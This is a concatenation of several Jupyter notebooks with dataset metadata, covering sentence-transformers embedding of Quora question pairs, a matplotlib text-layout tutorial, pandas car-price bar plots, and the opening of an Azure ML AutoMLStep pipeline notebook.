in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) (1.24.3)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) (3.0.4)\nRequirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->transformers==2.3.0->sentence_transformers) 
(2.8)\nRequirement already satisfied: docutils<0.16,>=0.10 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers==2.3.0->sentence_transformers) (0.15.2)\nRequirement already satisfied: python-dateutil<3.0.0,>=2.1 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers==2.3.0->sentence_transformers) (2.6.1)\nBuilding wheels for collected packages: sentence-transformers\n Building wheel for sentence-transformers (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for sentence-transformers: filename=sentence_transformers-0.2.5-cp36-none-any.whl size=64942 sha256=06a94fba28d1743f76016f0b307c1799b0f899ee2563439b69a1dabbf6a03995\n Stored in directory: /root/.cache/pip/wheels/b4/ce/39/5bbda8ac34eb52df8c6531382ca077773fbfcbfb6386e5d66c\nSuccessfully built sentence-transformers\nInstalling collected packages: transformers, sentence-transformers\n Found existing installation: transformers 2.4.1\n Uninstalling transformers-2.4.1:\n Successfully uninstalled transformers-2.4.1\nSuccessfully installed sentence-transformers-0.2.5 transformers-2.3.0\n"
],
[
"ls",
"\u001b[0m\u001b[01;34mdocs\u001b[0m/ NOTICE.txt requirements.txt setup.py\n\u001b[01;34mexamples\u001b[0m/ QuoraSentenceSimilarity.ipynb \u001b[01;34msentence_transformers\u001b[0m/ train.csv\nLICENSE README.md setup.cfg\n"
],
[
"cd '/content/drive/My Drive/sbert/sentence-transformers'",
"/content/drive/My Drive/sbert/sentence-transformers\n"
],
[
"!pip install transformers",
"Collecting transformers\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ee/fc/bd726a15ab2c66dc09306689d04da07a3770dad724f0883f0a4bfb745087/transformers-2.4.1-py3-none-any.whl (475kB)\n\r\u001b[K |▊ | 10kB 22.1MB/s eta 0:00:01\r\u001b[K |█▍ | 20kB 4.7MB/s eta 0:00:01\r\u001b[K |██ | 30kB 6.1MB/s eta 0:00:01\r\u001b[K |██▊ | 40kB 6.0MB/s eta 0:00:01\r\u001b[K |███▍ | 51kB 5.4MB/s eta 0:00:01\r\u001b[K |████▏ | 61kB 6.0MB/s eta 0:00:01\r\u001b[K |████▉ | 71kB 6.4MB/s eta 0:00:01\r\u001b[K |█████▌ | 81kB 7.0MB/s eta 0:00:01\r\u001b[K |██████▏ | 92kB 6.9MB/s eta 0:00:01\r\u001b[K |██████▉ | 102kB 6.9MB/s eta 0:00:01\r\u001b[K |███████▋ | 112kB 6.9MB/s eta 0:00:01\r\u001b[K |████████▎ | 122kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████ | 133kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████▋ | 143kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████▎ | 153kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████ | 163kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████▊ | 174kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████▍ | 184kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████ | 194kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████▊ | 204kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████▌ | 215kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████▏ | 225kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████▉ | 235kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████▌ | 245kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████▏ | 256kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████ | 266kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████▋ | 276kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████▎ | 286kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████ | 296kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████▋ | 307kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████▍ | 317kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████ | 327kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████▊ | 337kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████▍ | 348kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████ | 358kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████▉ | 368kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████████▌ | 378kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████████▏ | 389kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████████▉ | 399kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████████▌ | 409kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████████▎ | 419kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████████████ | 430kB 6.9MB/s eta 0:00:01\r\u001b[K |█████████████████████████████▋ | 440kB 6.9MB/s eta 0:00:01\r\u001b[K |██████████████████████████████▎ | 450kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████████████ | 460kB 6.9MB/s eta 0:00:01\r\u001b[K |███████████████████████████████▊| 471kB 6.9MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 481kB 6.9MB/s \n\u001b[?25hRequirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from transformers) (2.21.0)\nCollecting sacremoses\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a6/b4/7a41d630547a4afd58143597d5a49e07bfd4c42914d8335b2a5657efc14b/sacremoses-0.0.38.tar.gz (860kB)\n\u001b[K |████████████████████████████████| 870kB 16.0MB/s \n\u001b[?25hCollecting tokenizers==0.0.11\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/5e/36/7af38d572c935f8e0462ec7b4f7a46d73a2b3b1a938f50a5e8132d5b2dc5/tokenizers-0.0.11-cp36-cp36m-manylinux1_x86_64.whl (3.1MB)\n\u001b[K |████████████████████████████████| 3.1MB 30.7MB/s \n\u001b[?25hRequirement already 
satisfied: tqdm>=4.27 in /usr/local/lib/python3.6/dist-packages (from transformers) (4.28.1)\nCollecting sentencepiece\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/74/f4/2d5214cbf13d06e7cb2c20d84115ca25b53ea76fa1f0ade0e3c9749de214/sentencepiece-0.1.85-cp36-cp36m-manylinux1_x86_64.whl (1.0MB)\n\u001b[K |████████████████████████████████| 1.0MB 43.2MB/s \n\u001b[?25hRequirement already satisfied: boto3 in /usr/local/lib/python3.6/dist-packages (from transformers) (1.11.10)\nRequirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.6/dist-packages (from transformers) (2019.12.20)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from transformers) (1.17.5)\nRequirement already satisfied: filelock in /usr/local/lib/python3.6/dist-packages (from transformers) (3.0.12)\nRequirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (2.8)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (2019.11.28)\nRequirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (1.24.3)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers) (1.12.0)\nRequirement already satisfied: click in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers) (7.0)\nRequirement already satisfied: joblib in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers) (0.14.1)\nRequirement already satisfied: s3transfer<0.4.0,>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers) (0.3.2)\nRequirement already satisfied: botocore<1.15.0,>=1.14.10 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers) (1.14.10)\nRequirement already satisfied: jmespath<1.0.0,>=0.7.1 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers) (0.9.4)\nRequirement already satisfied: python-dateutil<3.0.0,>=2.1 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers) (2.6.1)\nRequirement already satisfied: docutils<0.16,>=0.10 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers) (0.15.2)\nBuilding wheels for collected packages: sacremoses\n Building wheel for sacremoses (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for sacremoses: filename=sacremoses-0.0.38-cp36-none-any.whl size=884628 sha256=30e961a6728c28c1bda9252a9bff9ca06b5a15bf01c7c8ed139a13bfbb6bd563\n Stored in directory: /root/.cache/pip/wheels/6d/ec/1a/21b8912e35e02741306f35f66c785f3afe94de754a0eaf1422\nSuccessfully built sacremoses\nInstalling collected packages: sacremoses, tokenizers, sentencepiece, transformers\nSuccessfully installed sacremoses-0.0.38 sentencepiece-0.1.85 tokenizers-0.0.11 transformers-2.4.1\n"
],
[
"import torch\nimport numpy as np\nimport pandas as pd\nfrom sentence_transformers import SentenceTransformer\nimport scipy.spatial\nfrom torch.utils.data import DataLoader\nimport time",
"_____no_output_____"
],
[
"pwd",
"_____no_output_____"
],
[
"df =pd.read_csv('/content/drive/My Drive/sbert/train.csv', header=None)",
"_____no_output_____"
],
[
"df[3] = df[3].astype(str)\ndf[4] = df[4].astype(str)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"from torch.utils.data import DataLoader\nimport math\nfrom sentence_transformers import models, losses\nfrom sentence_transformers import SentencesDataset, LoggingHandler, SentenceTransformer\nfrom sentence_transformers.evaluation import EmbeddingSimilarityEvaluator\nfrom sentence_transformers.readers import *\nfrom sentence_transformers.readers.QuoraDataReader import QuoraDataReader\nimport logging\nfrom datetime import datetime",
"_____no_output_____"
],
[
"pwd",
"_____no_output_____"
],
[
"from sentence_transformers.readers import InputExample\nimport csv\nimport gzip\nimport os\nimport pandas as pd\nclass QuoraDataReader:\n \"\"\"\n Reads in the STS dataset. Each line contains two sentences (s1_col_idx, s2_col_idx) and one label (score_col_idx)\n \"\"\"\n def __init__(self, dataset_folder, s1_col_idx=3, s2_col_idx=4, score_col_idx=5, delimiter=\"\\t\",\n quoting=csv.QUOTE_NONE, normalize_scores=True, min_score=0, max_score=1):\n self.dataset_folder = dataset_folder\n self.score_col_idx = score_col_idx\n self.s1_col_idx = s1_col_idx\n self.s2_col_idx = s2_col_idx\n self.delimiter = delimiter\n self.quoting = quoting\n self.normalize_scores = normalize_scores\n self.min_score = min_score\n self.max_score = max_score\n\n def get_examples(self, filename, max_examples=0):\n \"\"\"\n filename specified which data split to use (train.csv, dev.csv, test.csv).\n \"\"\"\n data = csv.reader(open(os.path.join(self.dataset_folder, filename), encoding=\"utf-8\"),\n delimiter=self.delimiter, quoting=self.quoting)\n df =pd.read_csv(os.path.join(self.dataset_folder, filename), header =None)\n df[self.s1_col_idx] = df[self.s1_col_idx].astype(str)\n df[self.s2_col_idx] = df[self.s2_col_idx].astype(str)\n examples = []\n \n for id,row in df.iterrows():\n score =int(row[self.score_col_idx])\n if self.normalize_scores: # Normalize to a 0...1 value\n score = (score - self.min_score) / (self.max_score - self.min_score)\n\n s1 = row[self.s1_col_idx]\n s2 = row[self.s2_col_idx]\n examples.append(InputExample(guid=filename+str(id), texts=[s1, s2], label=score))\n\n if max_examples > 0 and len(examples) >= max_examples:\n break\n\n return examples",
"_____no_output_____"
],
[
"ls '/content'",
"_____no_output_____"
],
[
"quora_reader = QuoraDataReader('/') ",
"_____no_output_____"
],
[
"model_name = 'bert-base-nli-mean-tokens'\ntrain_batch_size = 16\nnum_epochs = 4\nmodel_save_path = 'sentence-transformers-master/training_stsbenchmark_continue_training-'+model_name+'-'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")",
"_____no_output_____"
],
[
"\nmodel = SentenceTransformer(model_name)",
"100%|██████████| 405M/405M [00:10<00:00, 39.6MB/s]\n"
],
[
"pwd",
"_____no_output_____"
],
[
"tmp1 =df[1].tolist()\ntmp2 =df[2].tolist()\nk =tmp1 + tmp2",
"_____no_output_____"
],
[
"tmp1 =df[3].tolist()\ntmp2 =df[4].tolist()\nv =tmp1 + tmp2",
"_____no_output_____"
],
[
"train_data = SentencesDataset(quora_reader.get_examples('/content/drive/My Drive/sbert/train.csv'), model)\n",
"_____no_output_____"
],
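[
"# Fine-tuning is not actually run in this notebook; with this version of sentence-transformers a minimal\n# training step would look roughly like this (uses train_data, model, train_batch_size, num_epochs and\n# model_save_path from the cells above; warmup_steps and the evaluator choice are arbitrary here).\ntrain_dataloader = DataLoader(train_data, shuffle=True, batch_size=train_batch_size)\ntrain_loss = losses.CosineSimilarityLoss(model=model)\nevaluator = EmbeddingSimilarityEvaluator(train_dataloader)\nmodel.fit(train_objectives=[(train_dataloader, train_loss)],\n          evaluator=evaluator,\n          epochs=num_epochs,\n          warmup_steps=100,\n          output_path=model_save_path)",
"_____no_output_____"
],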
[
"from collections import OrderedDict \nres = OrderedDict(zip(k, v)) ",
"_____no_output_____"
],
[
"res = OrderedDict(sorted(res.items(), key=lambda x: int(x[0])))\n",
"_____no_output_____"
],
[
"corpus =list(res.values())\nlen(corpus)",
"_____no_output_____"
],
[
"tic=time.time()\nembeddings =model.encode(corpus)\ntoc=time.time()\nprint(toc- tic)\nvar =toc -tic",
"1260.0355427265167\n"
],
[
"embeddings",
"_____no_output_____"
],
[
"import pickle\n\nwith open('embeddings.pk', 'wb') as f:\n pickle.dump(mylist, f)",
"ERROR:root:Internal Python error in the inspect module.\nBelow is the traceback from this internal error.\n\n"
],
[
"pwd",
"_____no_output_____"
],
[
"train_batch_size = 16\ntest_data = SentencesDataset(examples=sts_reader.get_examples('/content/drive/My Drive/sbert/train.csv'), model=model)\ntest_dataloader = DataLoader(test_data, shuffle=False, batch_size=train_batch_size)\nevaluator = EmbeddingSimilarityEvaluator(test_dataloader)\nmodel.evaluate(evaluator)",
"ERROR:root:Internal Python error in the inspect module.\nBelow is the traceback from this internal error.\n\n"
],
[
"corpus = list(res.values())\nimport time",
"_____no_output_____"
],
[
"res.items()",
"_____no_output_____"
],
[
"\nlen(corpus)",
"_____no_output_____"
],
[
"\n# tic=time.time()\n",
"_____no_output_____"
],
[
"emembeddings",
"_____no_output_____"
],
[
"embeddings[0].shape",
"_____no_output_____"
],
[
" corpus_embeddings= embeddings",
"_____no_output_____"
],
[
"queries = ['How to order ']\nquery_embeddings = model.encode(queries)",
"_____no_output_____"
],
[
"closest_n = 10\nfor query, query_embedding in zip(queries, query_embeddings):\n distances = scipy.spatial.distance.cdist([query_embedding], corpus_embeddings, \"cosine\")[0]\n\n results = zip(range(len(distances)), distances)\n results = sorted(results, key=lambda x: x[1])\n\n print(\"\\n\\n======================\\n\\n\")\n print(\"Query:\", query)\n print(\"\\nTop 10 most similar sentences in corpus:\")\n\n for idx, distance in results[0:closest_n]:\n print(corpus[idx].strip(), \"(Score: %.4f)\" % (1-distance))",
"_____no_output_____"
],
[
"a = df[3].tolist()\na = [model.encode(i) for i in a]\nb=df[4].tolist()\na = [model.encode(i) for i in b]",
"_____no_output_____"
],
[
"a[:5]",
"_____no_output_____"
],
[
"b[:5]",
"_____no_output_____"
],
[
"!pip install sklearn",
"_____no_output_____"
],
[
"import sklearn\nfrom sklearn.metrics.pairwise import cosine_similarity",
"_____no_output_____"
],
[
"sklearn.metrics.pairwise.cosine_similarity(a, b, dense_output=True)",
"_____no_output_____"
],
[
"x = corpus_embeddings[0].reshape(-1,1)",
"_____no_output_____"
],
[
"x.shape",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb047e8fdd7ee10b90516da11d3f995f3a827c8b | 11,956 | ipynb | Jupyter Notebook | python/learn/matplotlib/tutorials_jupyter/text/text_props.ipynb | flyingwjw/Documentation | 567608f388ca369b864c2d75a94647801b5dfa1e | [
"Unlicense"
] | null | null | null | python/learn/matplotlib/tutorials_jupyter/text/text_props.ipynb | flyingwjw/Documentation | 567608f388ca369b864c2d75a94647801b5dfa1e | [
"Unlicense"
] | null | null | null | python/learn/matplotlib/tutorials_jupyter/text/text_props.ipynb | flyingwjw/Documentation | 567608f388ca369b864c2d75a94647801b5dfa1e | [
"Unlicense"
] | null | null | null | 196 | 4,965 | 0.483105 | [
[
[
"%matplotlib inline",
"_____no_output_____"
]
],
[
[
"\n# Text properties and layout\n\n\nControlling properties of text and its layout with Matplotlib.\n\nThe :class:`matplotlib.text.Text` instances have a variety of\nproperties which can be configured via keyword arguments to the text\ncommands (e.g., :func:`~matplotlib.pyplot.title`,\n:func:`~matplotlib.pyplot.xlabel` and :func:`~matplotlib.pyplot.text`).\n\n========================== ======================================================================================================================\nProperty Value Type\n========================== ======================================================================================================================\nalpha `float`\nbackgroundcolor any matplotlib :doc:`color </tutorials/colors/colors>`\nbbox `~matplotlib.patches.Rectangle` prop dict plus key ``'pad'`` which is a pad in points\nclip_box a matplotlib.transform.Bbox instance\nclip_on bool\nclip_path a `~matplotlib.path.Path` instance and a `~matplotlib.transforms.Transform` instance, a `~matplotlib.patches.Patch`\ncolor any matplotlib :doc:`color </tutorials/colors/colors>`\nfamily [ ``'serif'`` | ``'sans-serif'`` | ``'cursive'`` | ``'fantasy'`` | ``'monospace'`` ]\nfontproperties a `~matplotlib.font_manager.FontProperties` instance\nhorizontalalignment or ha [ ``'center'`` | ``'right'`` | ``'left'`` ]\nlabel any string\nlinespacing `float`\nmultialignment [``'left'`` | ``'right'`` | ``'center'`` ]\nname or fontname string e.g., [``'Sans'`` | ``'Courier'`` | ``'Helvetica'`` ...]\npicker [None|float|boolean|callable]\nposition (x, y)\nrotation [ angle in degrees | ``'vertical'`` | ``'horizontal'`` ]\nsize or fontsize [ size in points | relative size, e.g., ``'smaller'``, ``'x-large'`` ]\nstyle or fontstyle [ ``'normal'`` | ``'italic'`` | ``'oblique'`` ]\ntext string or anything printable with '%s' conversion\ntransform a `~matplotlib.transforms.Transform` instance\nvariant [ ``'normal'`` | ``'small-caps'`` ]\nverticalalignment or va [ ``'center'`` | ``'top'`` | ``'bottom'`` | ``'baseline'`` ]\nvisible bool\nweight or fontweight [ ``'normal'`` | ``'bold'`` | ``'heavy'`` | ``'light'`` | ``'ultrabold'`` | ``'ultralight'``]\nx `float`\ny `float`\nzorder any number\n========================== ======================================================================================================================\n\n\nYou can lay out text with the alignment arguments\n``horizontalalignment``, ``verticalalignment``, and\n``multialignment``. ``horizontalalignment`` controls whether the x\npositional argument for the text indicates the left, center or right\nside of the text bounding box. ``verticalalignment`` controls whether\nthe y positional argument for the text indicates the bottom, center or\ntop side of the text bounding box. ``multialignment``, for newline\nseparated strings only, controls whether the different lines are left,\ncenter or right justified. Here is an example which uses the\n:func:`~matplotlib.pyplot.text` command to show the various alignment\npossibilities. The use of ``transform=ax.transAxes`` throughout the\ncode indicates that the coordinates are given relative to the axes\nbounding box, with 0,0 being the lower left of the axes and 1,1 the\nupper right.\n\n",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# build a rectangle in axes coords\nleft, width = .25, .5\nbottom, height = .25, .5\nright = left + width\ntop = bottom + height\n\nfig = plt.figure()\nax = fig.add_axes([0, 0, 1, 1])\n\n# axes coordinates are 0,0 is bottom left and 1,1 is upper right\np = patches.Rectangle(\n (left, bottom), width, height,\n fill=False, transform=ax.transAxes, clip_on=False\n )\n\nax.add_patch(p)\n\nax.text(left, bottom, 'left top',\n horizontalalignment='left',\n verticalalignment='top',\n transform=ax.transAxes)\n\nax.text(left, bottom, 'left bottom',\n horizontalalignment='left',\n verticalalignment='bottom',\n transform=ax.transAxes)\n\nax.text(right, top, 'right bottom',\n horizontalalignment='right',\n verticalalignment='bottom',\n transform=ax.transAxes)\n\nax.text(right, top, 'right top',\n horizontalalignment='right',\n verticalalignment='top',\n transform=ax.transAxes)\n\nax.text(right, bottom, 'center top',\n horizontalalignment='center',\n verticalalignment='top',\n transform=ax.transAxes)\n\nax.text(left, 0.5*(bottom+top), 'right center',\n horizontalalignment='right',\n verticalalignment='center',\n rotation='vertical',\n transform=ax.transAxes)\n\nax.text(left, 0.5*(bottom+top), 'left center',\n horizontalalignment='left',\n verticalalignment='center',\n rotation='vertical',\n transform=ax.transAxes)\n\nax.text(0.5*(left+right), 0.5*(bottom+top), 'middle',\n horizontalalignment='center',\n verticalalignment='center',\n fontsize=20, color='red',\n transform=ax.transAxes)\n\nax.text(right, 0.5*(bottom+top), 'centered',\n horizontalalignment='center',\n verticalalignment='center',\n rotation='vertical',\n transform=ax.transAxes)\n\nax.text(left, top, 'rotated\\nwith newlines',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=45,\n transform=ax.transAxes)\n\nax.set_axis_off()\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Default Font\n\n\nThe base default font is controlled by a set of rcParams. To set the font\nfor mathematical expressions, use the rcParams beginning with ``mathtext``\n(see `mathtext <mathtext-fonts>`).\n\n+---------------------+----------------------------------------------------+\n| rcParam | usage |\n+=====================+====================================================+\n| ``'font.family'`` | List of either names of font or ``{'cursive', |\n| | 'fantasy', 'monospace', 'sans', 'sans serif', |\n| | 'sans-serif', 'serif'}``. |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.style'`` | The default style, ex ``'normal'``, |\n| | ``'italic'``. |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.variant'`` | Default variant, ex ``'normal'``, ``'small-caps'`` |\n| | (untested) |\n+---------------------+----------------------------------------------------+\n| ``'font.stretch'`` | Default stretch, ex ``'normal'``, ``'condensed'`` |\n| | (incomplete) |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.weight'`` | Default weight. Either string or integer |\n| | |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.size'`` | Default font size in points. Relative font sizes |\n| | (``'large'``, ``'x-small'``) are computed against |\n| | this size. |\n+---------------------+----------------------------------------------------+\n\nThe mapping between the family aliases (``{'cursive', 'fantasy',\n'monospace', 'sans', 'sans serif', 'sans-serif', 'serif'}``) and actual font names\nis controlled by the following rcParams:\n\n\n+------------------------------------------+--------------------------------+\n| family alias | rcParam with mappings |\n+==========================================+================================+\n| ``'serif'`` | ``'font.serif'`` |\n+------------------------------------------+--------------------------------+\n| ``'monospace'`` | ``'font.monospace'`` |\n+------------------------------------------+--------------------------------+\n| ``'fantasy'`` | ``'font.fantasy'`` |\n+------------------------------------------+--------------------------------+\n| ``'cursive'`` | ``'font.cursive'`` |\n+------------------------------------------+--------------------------------+\n| ``{'sans', 'sans serif', 'sans-serif'}`` | ``'font.sans-serif'`` |\n+------------------------------------------+--------------------------------+\n\n\nwhich are lists of font names.\n\nText with non-latin glyphs\n==========================\n\nAs of v2.0 the `default font <default_changes_font>` contains\nglyphs for many western alphabets, but still does not cover all of the\nglyphs that may be required by mpl users. 
For example, DejaVu has no\ncoverage of Chinese, Korean, or Japanese.\n\n\nTo set the default font to be one that supports the code points you\nneed, prepend the font name to ``'font.family'`` or the desired alias\nlists ::\n\n matplotlib.rcParams['font.sans-serif'] = ['Source Han Sans TW', 'sans-serif']\n\nor set it in your :file:`.matplotlibrc` file::\n\n font.sans-serif: Source Han Sans TW, Arial, sans-serif\n\nTo control the font used on per-artist basis use the ``'name'``,\n``'fontname'`` or ``'fontproperties'`` kwargs documented :doc:`above\n</tutorials/text/text_props>`.\n\n\nOn linux, `fc-list <https://linux.die.net/man/1/fc-list>`__ can be a\nuseful tool to discover the font name; for example ::\n\n $ fc-list :lang=zh family\n Noto to Sans Mono CJK TC,Noto Sans Mono CJK TC Bold\n Noto Sans CJK TC,Noto Sans CJK TC Medium\n Noto Sans CJK TC,Noto Sans CJK TC DemiLight\n Noto Sans CJK KR,Noto Sans CJK KR Black\n Noto Sans CJK TC,Noto Sans CJK TC Black\n Noto Sans Mono CJK TC,Noto Sans Mono CJK TC Regular\n Noto Sans CJK SC,Noto Sans CJK SC Light\n\nlists all of the fonts that support Chinese.\n\n\n",
"_____no_output_____"
]
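,
[
"# A tiny illustration of the rcParams described above; the family alias used here is a safe default,\n# and any installed font name could be prepended to the alias list instead.\nimport matplotlib\n\nmatplotlib.rcParams['font.family'] = 'sans-serif'\nmatplotlib.rcParams['font.size'] = 12.0\nprint(matplotlib.rcParams['font.sans-serif'])",
"_____no_output_____"
]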
]
] | [
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb0495efd136d72c94c3ebe8f134f76c60182c91 | 158,967 | ipynb | Jupyter Notebook | day2_visualisation.ipynb | lejekjr/dw_matric_car | 81824b7b02912b5a614663054b8216d9025d6dc4 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | lejekjr/dw_matric_car | 81824b7b02912b5a614663054b8216d9025d6dc4 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | lejekjr/dw_matric_car | 81824b7b02912b5a614663054b8216d9025d6dc4 | [
"MIT"
] | null | null | null | 158,967 | 158,967 | 0.931168 | [
[
[
"!pip install --upgrade tables",
"Collecting tables\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ed/c3/8fd9e3bb21872f9d69eb93b3014c86479864cca94e625fd03713ccacec80/tables-3.6.1-cp36-cp36m-manylinux1_x86_64.whl (4.3MB)\n\u001b[K |████████████████████████████████| 4.3MB 4.9MB/s \n\u001b[?25hRequirement already satisfied, skipping upgrade: numpy>=1.9.3 in /usr/local/lib/python3.6/dist-packages (from tables) (1.17.5)\nRequirement already satisfied, skipping upgrade: numexpr>=2.6.2 in /usr/local/lib/python3.6/dist-packages (from tables) (2.7.1)\nInstalling collected packages: tables\n Found existing installation: tables 3.4.4\n Uninstalling tables-3.4.4:\n Successfully uninstalled tables-3.4.4\nSuccessfully installed tables-3.6.1\n"
],
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns",
"_____no_output_____"
],
[
"cd \"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_two/dw_matric_car\"",
"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_two/dw_matric_car\n"
],
[
"ls",
"\u001b[0m\u001b[01;34mdata\u001b[0m/ LICENSE README.md\n"
],
[
"df = pd.read_hdf('data/car.h5')\ndf.shape",
"_____no_output_____"
],
[
"df.columns.values",
"_____no_output_____"
],
[
"df['price_value'].hist(bins=100);",
"_____no_output_____"
],
[
"df['price_value'].describe()",
"_____no_output_____"
],
[
"df['param_marka-pojazdu'].unique()",
"_____no_output_____"
],
[
"def group_and_barplot(feat_groupby, feat_agg='price_value', agg_funcs=[np.mean, np.median, np.size], feat_sort='mean', top=50, subplots=True):\n return (\n df\n .groupby(feat_groupby)[feat_agg]\n .agg(agg_funcs)\n .sort_values(by=feat_sort, ascending=False)\n .head(top)\n \n ).plot(kind='bar', figsize=(15,5), subplots=subplots)\n\n\n",
"_____no_output_____"
],
[
"group_and_barplot('param_marka-pojazdu');\n",
"_____no_output_____"
],
[
"group_and_barplot('param_kraj-pochodzenia');",
"_____no_output_____"
],
[
"group_and_barplot('param_kraj-pochodzenia', feat_sort='size');",
"_____no_output_____"
],
[
"group_and_barplot('param_kolor', feat_sort='mean'); ",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb049d7babdd112ddb939008ff35788eba63f90c | 17,340 | ipynb | Jupyter Notebook | how-to-use-azureml/machine-learning-pipelines/intro-to-pipelines/aml-pipelines-with-automated-machine-learning-step.ipynb | tmccrmck/MachineLearningNotebooks | 512630472b1c6f640e164d5889b30f2fed74d04a | [
"MIT"
] | 1 | 2020-03-02T12:40:42.000Z | 2020-03-02T12:40:42.000Z | how-to-use-azureml/machine-learning-pipelines/intro-to-pipelines/aml-pipelines-with-automated-machine-learning-step.ipynb | tmccrmck/MachineLearningNotebooks | 512630472b1c6f640e164d5889b30f2fed74d04a | [
"MIT"
] | null | null | null | how-to-use-azureml/machine-learning-pipelines/intro-to-pipelines/aml-pipelines-with-automated-machine-learning-step.ipynb | tmccrmck/MachineLearningNotebooks | 512630472b1c6f640e164d5889b30f2fed74d04a | [
"MIT"
] | 1 | 2021-06-10T15:57:01.000Z | 2021-06-10T15:57:01.000Z | 33.154876 | 474 | 0.532122 | [
[
[
"Copyright (c) Microsoft Corporation. All rights reserved. \nLicensed under the MIT License.",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"# Azure Machine Learning Pipeline with AutoMLStep\nThis notebook demonstrates the use of AutoMLStep in Azure Machine Learning Pipeline.",
"_____no_output_____"
],
[
